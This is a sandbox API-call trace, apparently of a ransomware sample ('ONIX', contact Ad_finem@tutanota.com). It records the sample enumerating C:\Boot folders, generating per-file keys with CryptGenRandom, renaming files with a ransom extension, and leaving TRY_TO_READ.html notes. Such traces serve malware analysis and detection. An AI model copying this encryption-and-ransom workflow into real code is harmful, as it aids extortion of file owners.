[0065.485] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.485] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.485] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47f4a0 [0065.485] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x48e6f0 [0065.485] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48e6f0 | out: hHeap=0x410000) returned 1 [0065.485] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.485] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.485] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47f4a0 | out: hHeap=0x410000) returned 1 [0065.485] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.485] FindNextFileW (in: hFindFile=0x48e6b0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x309bac30, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x309bac30, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.485] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.485] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.485] GetLastError () returned 0x0 [0065.485] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.485] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.485] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.485] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47f4a0 [0065.485] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x48e6f0 [0065.485] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48e6f0 | out: hHeap=0x410000) returned 1 [0065.485] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.485] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.485] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47f4a0 | out: hHeap=0x410000) returned 1 [0065.485] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.485] FindNextFileW (in: hFindFile=0x48e6b0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.486] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.486] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.486] GetLastError () returned 0x0 [0065.486] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47f4a0 [0065.486] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.486] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.486] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.486] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.486] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47f4a0 | out: hHeap=0x410000) returned 1 [0065.486] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.486] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100) returned 0x48d7d0 [0065.486] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466758 [0065.486] CreateFileW (lpFileName="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.486] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.486] CreateFileW (lpFileName="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.486] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.486] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48d7d0 | out: pbBuffer=0x48d7d0) returned 1 [0065.486] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x466758 | out: pbBuffer=0x466758) returned 1 [0065.486] SetFileAttributesW (lpFileName="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0065.486] lstrlenW (lpString="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui") returned 30 [0065.487] GetProcessHeap () returned 0x410000 [0065.487] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xac) returned 0x473108 [0065.487] lstrcpyW (in: lpString1=0x473108, lpString2="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui") returned="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui" [0065.487] lstrcatW (in: lpString1="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0065.487] GetProcessHeap () returned 0x410000 [0065.487] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473108 | out: hHeap=0x410000) returned 1 [0065.487] CloseHandle (hObject=0xffffffff) returned 0 [0065.487] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.487] FindNextFileW (in: hFindFile=0x48e6b0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x309bac30, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x309bac30, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x309bac30, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0065.487] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.487] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.487] GetLastError () returned 0x6 [0065.487] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.487] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c60 [0065.487] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.487] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.487] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c60 | out: hHeap=0x410000) returned 1 [0065.487] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.487] FindNextFileW (in: hFindFile=0x48e6b0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x309bac30, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x309bac30, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x309bac30, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0065.487] CloseHandle (hObject=0x3cc) returned 1 [0065.487] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.487] GetSystemTime (in: lpSystemTime=0x530400 | out: lpSystemTime=0x530400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x5, wMilliseconds=0x7f)) [0065.487] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x540000 [0065.488] GetWindowsDirectoryW (in: lpBuffer=0x540000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0065.488] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x540200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x540600, lpMaximumComponentLength=0x540608, lpFileSystemFlags=0x540604, lpFileSystemNameBuffer=0x540400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x540600*=0x9c354b42, lpMaximumComponentLength=0x540608*=0xff, lpFileSystemFlags=0x540604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0065.488] wsprintfW (in: param_1=0x530000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Boot\\zh-HK9c354ca09c354b444c.lock") returned 37 [0065.488] CreateFileW (lpFileName="C:\\\\Boot\\zh-HK9c354ca09c354b444c.lock" (normalized: "c:\\boot\\zh-hk9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0065.488] VirtualFree (lpAddress=0x540000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.488] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.488] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.488] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.488] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47f4f0 | out: hHeap=0x410000) returned 1 [0065.489] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47f518 | out: hHeap=0x410000) returned 1 [0065.489] FindFirstFileW (in: lpFileName="C:\\\\Boot\\zh-HK\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x309bac30, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x309bac30, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48e6f0 [0065.489] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.489] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.489] GetLastError () returned 0x0 [0065.489] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.489] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.489] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.489] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47f4f0 [0065.489] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x48e730 [0065.489] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48e730 | out: hHeap=0x410000) returned 1 [0065.489] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.489] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.489] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47f4f0 | out: hHeap=0x410000) returned 1 [0065.489] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.489] FindNextFileW (in: hFindFile=0x48e6f0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x309bac30, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x309bac30, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.489] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.489] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.489] GetLastError () returned 0x0 [0065.489] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.489] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.489] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.489] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47f4f0 [0065.489] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x48e730 [0065.489] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48e730 | out: hHeap=0x410000) returned 1 [0065.489] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.489] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.489] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47f4f0 | out: hHeap=0x410000) returned 1 [0065.489] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.489] FindNextFileW (in: hFindFile=0x48e6f0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.489] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.489] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.489] GetLastError () returned 0x0 [0065.490] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47f4f0 [0065.490] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.490] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.490] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.490] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.490] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47f4f0 | out: hHeap=0x410000) returned 1 [0065.490] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.490] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100) returned 0x48d8d8 [0065.490] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466768 [0065.490] CreateFileW (lpFileName="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.490] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.490] CreateFileW (lpFileName="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.490] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.490] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48d8d8 | out: pbBuffer=0x48d8d8) returned 1 [0065.490] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x466768 | out: pbBuffer=0x466768) returned 1 [0065.490] SetFileAttributesW (lpFileName="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0065.490] lstrlenW (lpString="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui") returned 30 [0065.490] GetProcessHeap () returned 0x410000 [0065.491] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xac) returned 0x473108 [0065.491] lstrcpyW (in: lpString1=0x473108, lpString2="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui") returned="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui" [0065.491] lstrcatW (in: lpString1="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0065.491] GetProcessHeap () returned 0x410000 [0065.491] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473108 | out: hHeap=0x410000) returned 1 [0065.491] CloseHandle (hObject=0xffffffff) returned 0 [0065.491] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.491] FindNextFileW (in: hFindFile=0x48e6f0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x309bac30, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x309bac30, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x309bac30, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0065.491] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.491] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.491] GetLastError () returned 0x6 [0065.491] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.491] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c60 [0065.491] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.491] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.491] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c60 | out: hHeap=0x410000) returned 1 [0065.491] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.491] FindNextFileW (in: hFindFile=0x48e6f0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x309bac30, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x309bac30, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x309bac30, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0065.491] CloseHandle (hObject=0x3cc) returned 1 [0065.491] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.491] GetSystemTime (in: lpSystemTime=0x530400 | out: lpSystemTime=0x530400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x5, wMilliseconds=0x7f)) [0065.491] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x540000 [0065.492] GetWindowsDirectoryW (in: lpBuffer=0x540000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0065.492] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x540200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x540600, lpMaximumComponentLength=0x540608, lpFileSystemFlags=0x540604, lpFileSystemNameBuffer=0x540400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x540600*=0x9c354b42, lpMaximumComponentLength=0x540608*=0xff, lpFileSystemFlags=0x540604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0065.492] wsprintfW (in: param_1=0x530000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Boot\\zh-TW9c354ca09c354b444c.lock") returned 37 [0065.492] CreateFileW (lpFileName="C:\\\\Boot\\zh-TW9c354ca09c354b444c.lock" (normalized: "c:\\boot\\zh-tw9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0065.492] VirtualFree (lpAddress=0x540000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.492] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.492] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.492] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.493] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47f540 | out: hHeap=0x410000) returned 1 [0065.493] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47f568 | out: hHeap=0x410000) returned 1 [0065.493] FindFirstFileW (in: lpFileName="C:\\\\Boot\\zh-TW\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x309bac30, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x309bac30, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48e730 [0065.493] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.493] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.493] GetLastError () returned 0x0 [0065.493] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.493] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.493] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.493] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47f540 [0065.493] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x48e770 [0065.493] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48e770 | out: hHeap=0x410000) returned 1 [0065.493] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.493] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.493] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47f540 | out: hHeap=0x410000) returned 1 [0065.493] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.493] FindNextFileW (in: hFindFile=0x48e730, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x309bac30, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x309bac30, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.493] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.493] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.493] GetLastError () returned 0x0 [0065.493] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.493] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.493] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.493] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47f540 [0065.493] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x48e770 [0065.493] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48e770 | out: hHeap=0x410000) returned 1 [0065.494] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.494] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.494] 